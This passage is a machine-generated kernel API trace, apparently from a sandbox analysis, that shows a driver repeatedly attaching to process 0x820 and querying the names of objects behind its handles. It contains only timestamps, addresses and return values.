HandleInformation=0x0) returned 0x0 [0290.106] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.106] PsReleaseProcessExitSynchronization () returned 0x2 [0290.106] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6bc [0290.106] ObQueryNameString (in: Object=0xffffe0006a2a8c40, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.106] ObfDereferenceObject (Object=0xffffe0006a2a8c40) returned 0x7ffe [0290.106] IoCompleteRequest () returned 0x0 [0290.106] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.106] PsAcquireProcessExitSynchronization () returned 0x0 [0290.106] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.106] ObReferenceObjectByHandle (in: Handle=0x1674, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a49ba70, HandleInformation=0x0) returned 0x0 [0290.106] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.106] PsReleaseProcessExitSynchronization () returned 0x2 [0290.106] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6bb [0290.106] ObQueryNameString (in: Object=0xffffe0006a49ba70, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.106] ObfDereferenceObject (Object=0xffffe0006a49ba70) returned 0x7ffe [0290.106] IoCompleteRequest () returned 0x0 [0290.106] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.106] PsAcquireProcessExitSynchronization () returned 0x0 [0290.106] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.106] ObReferenceObjectByHandle (in: Handle=0x167c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a49bbe0, HandleInformation=0x0) returned 0x0 [0290.106] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.106] PsReleaseProcessExitSynchronization () returned 0x2 [0290.106] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ba [0290.106] ObQueryNameString (in: Object=0xffffe0006a49bbe0, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.106] ObfDereferenceObject (Object=0xffffe0006a49bbe0) returned 0x7ffe [0290.106] IoCompleteRequest () returned 0x0 [0290.106] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.106] PsAcquireProcessExitSynchronization () returned 0x0 [0290.106] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.106] ObReferenceObjectByHandle (in: Handle=0x1684, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a49b40, HandleInformation=0x0) returned 0x0 [0290.107] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.107] PsReleaseProcessExitSynchronization () returned 0x2 [0290.107] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6b9 [0290.107] ObQueryNameString (in: Object=0xffffe00069a49b40, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.107] ObfDereferenceObject (Object=0xffffe00069a49b40) returned 0x7ffe [0290.107] IoCompleteRequest () returned 0x0 [0290.107] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.107] PsAcquireProcessExitSynchronization () returned 0x0 [0290.107] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.107] ObReferenceObjectByHandle (in: Handle=0x1688, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a1116a0, HandleInformation=0x0) returned 0x0 [0290.107] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.107] PsReleaseProcessExitSynchronization () returned 0x2 [0290.107] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6b8 [0290.107] ObQueryNameString (in: Object=0xffffe0006a1116a0, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.107] ObfDereferenceObject (Object=0xffffe0006a1116a0) returned 0x7ffe [0290.107] IoCompleteRequest () returned 0x0 [0290.107] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.107] PsAcquireProcessExitSynchronization () returned 0x0 [0290.107] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.107] ObReferenceObjectByHandle (in: Handle=0x16a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a24f4e0, HandleInformation=0x0) returned 0x0 [0290.107] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.107] PsReleaseProcessExitSynchronization () returned 0x2 [0290.107] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6b7 [0290.107] ObQueryNameString (in: Object=0xffffe0006a24f4e0, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.107] ObfDereferenceObject (Object=0xffffe0006a24f4e0) returned 0x7ffe [0290.107] IoCompleteRequest () returned 0x0 [0290.107] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.107] PsAcquireProcessExitSynchronization () returned 0x0 [0290.107] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.107] ObReferenceObjectByHandle (in: Handle=0x16a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a33f9f0, HandleInformation=0x0) returned 0x0 [0290.107] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.107] PsReleaseProcessExitSynchronization () returned 0x2 [0290.107] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6b6 [0290.107] ObQueryNameString (in: Object=0xffffe0006a33f9f0, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.108] ObfDereferenceObject (Object=0xffffe0006a33f9f0) returned 0x7ffe [0290.108] IoCompleteRequest () returned 0x0 [0290.108] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.108] PsAcquireProcessExitSynchronization () returned 0x0 [0290.108] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.108] ObReferenceObjectByHandle (in: Handle=0x16a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069235090, HandleInformation=0x0) returned 0x0 [0290.108] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.108] PsReleaseProcessExitSynchronization () returned 0x2 [0290.108] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6b5 [0290.108] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.108] ObfDereferenceObject (Object=0xffffe00069235090) returned 0xfffc [0290.108] IoCompleteRequest () returned 0x0 [0290.108] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.108] PsAcquireProcessExitSynchronization () returned 0x0 [0290.108] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.108] ObReferenceObjectByHandle (in: Handle=0x16d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2676f0, HandleInformation=0x0) returned 0x0 [0290.108] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.108] PsReleaseProcessExitSynchronization () returned 0x2 [0290.108] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6b4 [0290.108] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.108] ObfDereferenceObject (Object=0xffffe0006a2676f0) returned 0xffe4 [0290.108] IoCompleteRequest () returned 0x0 [0290.108] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.108] PsAcquireProcessExitSynchronization () returned 0x0 [0290.108] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.108] ObReferenceObjectByHandle (in: Handle=0x16dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2676f0, HandleInformation=0x0) returned 0x0 [0290.108] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.108] PsReleaseProcessExitSynchronization () returned 0x2 [0290.108] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6b3 [0290.108] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.108] ObfDereferenceObject (Object=0xffffe0006a2676f0) returned 0xffe3 [0290.108] IoCompleteRequest () returned 0x0 [0290.108] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.108] PsAcquireProcessExitSynchronization () returned 0x0 [0290.108] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.108] ObReferenceObjectByHandle (in: Handle=0x16e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a7f3710, HandleInformation=0x0) returned 0x0 [0290.108] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.108] PsReleaseProcessExitSynchronization () returned 0x2 [0290.108] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6b2 [0290.108] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.108] ObfDereferenceObject (Object=0xffffe0006a7f3710) returned 0x7fe7 [0290.108] IoCompleteRequest () returned 0x0 [0290.108] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.108] PsAcquireProcessExitSynchronization () returned 0x0 [0290.109] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.109] ObReferenceObjectByHandle (in: Handle=0x16ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a044f20, HandleInformation=0x0) returned 0x0 [0290.109] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.109] PsReleaseProcessExitSynchronization () returned 0x2 [0290.109] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6b1 [0290.109] ObQueryNameString (in: Object=0xffffe0006a044f20, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.109] ObfDereferenceObject (Object=0xffffe0006a044f20) returned 0x7ffd [0290.109] IoCompleteRequest () returned 0x0 [0290.109] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.109] PsAcquireProcessExitSynchronization () returned 0x0 [0290.109] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.109] ObReferenceObjectByHandle (in: Handle=0x1708, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a705a20, HandleInformation=0x0) returned 0x0 [0290.109] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.109] PsReleaseProcessExitSynchronization () returned 0x2 [0290.109] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6b0 [0290.109] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.109] ObfDereferenceObject (Object=0xffffe0006a705a20) returned 0x7fce [0290.109] IoCompleteRequest () returned 0x0 [0290.109] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.109] PsAcquireProcessExitSynchronization () returned 0x0 [0290.109] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.109] ObReferenceObjectByHandle (in: Handle=0x1720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a5f56c0, HandleInformation=0x0) returned 0x0 [0290.109] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.109] PsReleaseProcessExitSynchronization () returned 0x2 [0290.109] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6af [0290.109] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.109] ObfDereferenceObject (Object=0xffffe0006a5f56c0) returned 0xfffc [0290.109] IoCompleteRequest () returned 0x0 [0290.109] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.109] PsAcquireProcessExitSynchronization () returned 0x0 [0290.109] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.109] ObReferenceObjectByHandle (in: Handle=0x1728, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a5f56c0, HandleInformation=0x0) returned 0x0 [0290.109] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.109] PsReleaseProcessExitSynchronization () returned 0x2 [0290.109] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ae [0290.109] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.109] ObfDereferenceObject (Object=0xffffe0006a5f56c0) returned 0xfffb [0290.109] IoCompleteRequest () returned 0x0 [0290.109] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.109] PsAcquireProcessExitSynchronization () returned 0x0 [0290.109] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.109] ObReferenceObjectByHandle (in: Handle=0x172c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a47c780, HandleInformation=0x0) returned 0x0 [0290.109] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.109] PsReleaseProcessExitSynchronization () returned 0x2 [0290.110] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ad [0290.110] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.110] ObfDereferenceObject (Object=0xffffe0006a47c780) returned 0xfff9 [0290.110] IoCompleteRequest () returned 0x0 [0290.110] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.110] PsAcquireProcessExitSynchronization () returned 0x0 [0290.110] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.110] ObReferenceObjectByHandle (in: Handle=0x1868, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2562d0, HandleInformation=0x0) returned 0x0 [0290.110] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.110] PsReleaseProcessExitSynchronization () returned 0x2 [0290.110] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ac [0290.110] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.110] ObfDereferenceObject (Object=0xffffe0006a2562d0) returned 0x7ffc [0290.110] IoCompleteRequest () returned 0x0 [0290.110] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.110] PsAcquireProcessExitSynchronization () returned 0x0 [0290.110] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.110] ObReferenceObjectByHandle (in: Handle=0x186c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6e6780, HandleInformation=0x0) returned 0x0 [0290.110] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.110] PsReleaseProcessExitSynchronization () returned 0x2 [0290.110] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ab [0290.110] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.110] ObfDereferenceObject (Object=0xffffe0006a6e6780) returned 0x7ff3 [0290.110] IoCompleteRequest () returned 0x0 [0290.110] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.110] PsAcquireProcessExitSynchronization () returned 0x0 [0290.110] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.110] ObReferenceObjectByHandle (in: Handle=0x1880, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a705740, HandleInformation=0x0) returned 0x0 [0290.110] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.110] PsReleaseProcessExitSynchronization () returned 0x2 [0290.110] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6aa [0290.110] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.110] ObfDereferenceObject (Object=0xffffe0006a705740) returned 0x7fde [0290.110] IoCompleteRequest () returned 0x0 [0290.110] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.110] PsAcquireProcessExitSynchronization () returned 0x0 [0290.110] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.110] ObReferenceObjectByHandle (in: Handle=0x1960, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a740990, HandleInformation=0x0) returned 0x0 [0290.110] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.110] PsReleaseProcessExitSynchronization () returned 0x2 [0290.110] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6a9 [0290.110] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.110] ObfDereferenceObject (Object=0xffffe0006a740990) returned 0x7ff3 [0290.110] IoCompleteRequest () returned 0x0 [0290.110] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.111] PsAcquireProcessExitSynchronization () returned 0x0 [0290.111] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.111] ObReferenceObjectByHandle (in: Handle=0x1988, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a02a090, HandleInformation=0x0) returned 0x0 [0290.111] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.111] PsReleaseProcessExitSynchronization () returned 0x2 [0290.111] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6a8 [0290.111] ObQueryNameString (in: Object=0xffffe0006a02a090, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.111] ObfDereferenceObject (Object=0xffffe0006a02a090) returned 0x800c [0290.111] IoCompleteRequest () returned 0x0 [0290.111] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.111] PsAcquireProcessExitSynchronization () returned 0x0 [0290.111] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.111] ObReferenceObjectByHandle (in: Handle=0x1994, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a70650, HandleInformation=0x0) returned 0x0 [0290.111] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.111] PsReleaseProcessExitSynchronization () returned 0x2 [0290.111] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6a7 [0290.111] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.111] ObfDereferenceObject (Object=0xffffe00068a70650) returned 0x7ffc [0290.111] IoCompleteRequest () returned 0x0 [0290.111] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.111] PsAcquireProcessExitSynchronization () returned 0x0 [0290.111] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.111] ObReferenceObjectByHandle (in: Handle=0x19a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a47c780, HandleInformation=0x0) returned 0x0 [0290.111] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.111] PsReleaseProcessExitSynchronization () returned 0x2 [0290.111] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6a6 [0290.111] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.111] ObfDereferenceObject (Object=0xffffe0006a47c780) returned 0xfff8 [0290.111] IoCompleteRequest () returned 0x0 [0290.111] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.111] PsAcquireProcessExitSynchronization () returned 0x0 [0290.111] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.111] ObReferenceObjectByHandle (in: Handle=0x19c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a485730, HandleInformation=0x0) returned 0x0 [0290.111] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.111] PsReleaseProcessExitSynchronization () returned 0x2 [0290.111] ObfDereferenceObject (Object=0xffffe00069ef4840) 